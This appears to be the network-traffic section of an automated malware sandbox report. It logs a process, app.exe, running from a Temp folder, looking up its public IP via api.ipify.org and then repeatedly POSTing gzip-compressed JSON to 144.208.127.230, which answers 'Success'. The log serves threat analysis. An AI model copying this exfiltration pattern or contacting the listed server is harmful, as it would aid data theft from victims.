                                                                                                                                            May 5, 2024 00:25:09.456600904 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.456636906 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456676960 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456716061 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456754923 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456770897 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.456794024 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456834078 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456871986 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456902981 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.456911087 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456950903 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.456989050 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.457026958 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.457062960 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.457236052 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.561199903 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561284065 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561358929 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561402082 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561403990 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.561446905 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561522007 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561568975 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561676025 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561744928 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.561764002 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561811924 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561872959 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561913013 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.561911106 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:25:09.561990976 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.562032938 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:25:09.562096119 CEST8049789144.208.127.230192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 5, 2024 00:24:47.800074100 CEST | 54765 | 53 | 192.168.11.20 | 1.1.1.1
May 5, 2024 00:24:47.899873972 CEST | 53 | 54765 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 5, 2024 00:24:47.800074100 CEST | 192.168.11.20 | 1.1.1.1 | 0x3613 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
May 5, 2024 00:24:47.899873972 CEST | 1.1.1.1 | 192.168.11.20 | 0x3613 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                                                                                                            • api.ipify.org
                                                                                                                                            • 144.208.127.230
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49789 | 144.208.127.230 | 80 | 7132 | C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
Timestamp | Bytes transferred | Direction | Data
May 5, 2024 00:24:50.216104031 CEST | 244 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 451
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:50.216152906 CEST | 451 | OUT | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 92 dd 6e e2 30 10 85 5f 65 e4 ab 56 2a 91 b3 d0 68 c3 d5 a6 b0 0a bb 2b b4 15 bb a8 37 96 22 13 0f 89 d5 60 47 b6 03 fd 51 df bd 76 02 54 a8 bd b3 3e 9f 33 33 67 ec 57 a2 f8 0e c9 94 ac ee 8a 87 98 26 93 82 8e c9
                                                                                                                                            Data Ascii: mn0_eV*h+7"`GQvT>33gW&q5{w{rnx=+bdqt%0Y4\3\CSS!-jmZ=*}P_Hb#$ATAFo)k,zA*bF0Q~.B$hFxq#
May 5, 2024 00:24:50.450010061 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                            Content-Length: 8305
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
Data Ascii: {"status": "Success", "k": "8tnelc", "c": "[TRUNCATED]
May 5, 2024 00:24:50.615658998 CEST | 244 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 996
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:50.615658998 CEST | 996 | OUT | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 4d 54 dd 8e e3 34 14 7e 97 b9 46 c8 16 14 a9 73 47 5a 3b ad 9b ba e3 63 9f e3 8e 55 09 65 c9 6a 83 6c d8 68 36 88 22 c4 bb f3 e5 8e bb c4 51 ce f9 7e fd cf cb 1f e3 ef 9f 5f 5e 5f a8 fb 25 6b f5 d3 8f bf a8 1f 5e be
                                                                                                                                            Data Ascii: MT4~FsGZ;cUejlh6"Q~_^_%k^{Y[vcx?[].Gbuw??}ANoMJQKC]GJzF_,{&vQ\eLm.V).&*QMB0AQ]J76H+>vB
May 5, 2024 00:24:50.746968031 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:50.784807920 CEST | 245 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1008
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:50.784807920 CEST | 1008 | OUT | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 1d 94 51 8f 22 37 10 84 ff cb 3e 47 91 47 09 91 d8 b7 33 d8 03 06 86 75 db dd 06 0b e9 34 a7 39 dd 44 ee e4 46 bb 44 22 8a f2 df af b8 27 d0 d8 6e 77 57 7d e5 ff 5e fe 1e ff fa fa f2 fa 42 f6 73 e9 cc 1f bf 7f 36 bf
                                                                                                                                            Data Ascii: Q"7>GG3u49DFD"'nwW}^Bs6r/^_7|}>ovn}Ll//x7G>B_ON[:_DgCd=N9rLxgb6wnlt#naIfYmON-Ds
May 5, 2024 00:24:50.913850069 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:50 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:50.960611105 CEST | 245 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1007
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:50.960611105 CEST | 1007 | OUT | Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 25 94 51 af e3 34 10 85 ff cb 7d 46 c8 16 04 e9 ee 1b 69 ed a4 6e eb 5e 8f 3d e3 d4 aa b4 ca 2a cb 06 d9 b0 d1 dd 22 8a 10 ff 9d 53 78 a8 d4 26 f5 78 e6 cc 77 ce df 2f bf cf bf 7d 7e f9 f0 42 fd c7 ac d5 4f 3f 7e 54
                                                                                                                                            Data Ascii: %Q4}Fin^=*"Sx&xw/}~BO?~T?|rO|pnznCOlCtzuejeI\jMfb9Qs)j+b!Y:&+!69l9!3Je3K\RC%r
May 5, 2024 00:24:51.089246988 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:51.138124943 CEST | 244 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 992
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:51.273591042 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:51.344860077 CEST | 245 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1004
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:51.474955082 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:51.581295013 CEST | 245 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:51.720448017 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:51.754550934 CEST | 245 | OUT | POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1005
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:51.886817932 CEST | 280 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:51 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:51.993621111 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1000
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:52.130491972 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:52.209886074 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 999
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:52.350059032 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:52.440471888 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 998
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:52.572115898 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:52.687793016 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 992
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:52.820131063 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:52 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:52.944320917 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 995
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:53.075536013 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:53 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:53.186395884 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 999
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:53.317679882 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:53 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:53.392790079 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1010
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:53.543199062 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:53 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:53.618834972 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1010
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:53.751441956 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:53 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:53.826003075 CEST  244  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 994
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:53.958475113 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:53 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:54.029484987 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1006
                                                                                                                                            Host: 144.208.127.230
May 5, 2024 00:24:54.167054892 CEST  280  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:54 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
May 5, 2024 00:24:54.272589922 CEST  245  OUT  POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1005
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.422990084 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:54 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:54.486279011 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1008
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.623517990 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:54 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:54.725047112 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.859028101 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:54 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
                                                                                                                                            May 5, 2024 00:24:54.956692934 CEST 245 OUT POST / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/json
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1002
                                                                                                                                            Host: 144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.100518942 CEST 280 IN HTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Sat, 04 May 2024 22:24:55 GMT
                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                            Content-Length: 7
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                            X-Frame-Options: sameorigin
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Referrer-Policy: no-referrer
                                                                                                                                            Data Raw: 53 75 63 63 65 73 73
                                                                                                                                            Data Ascii: Success
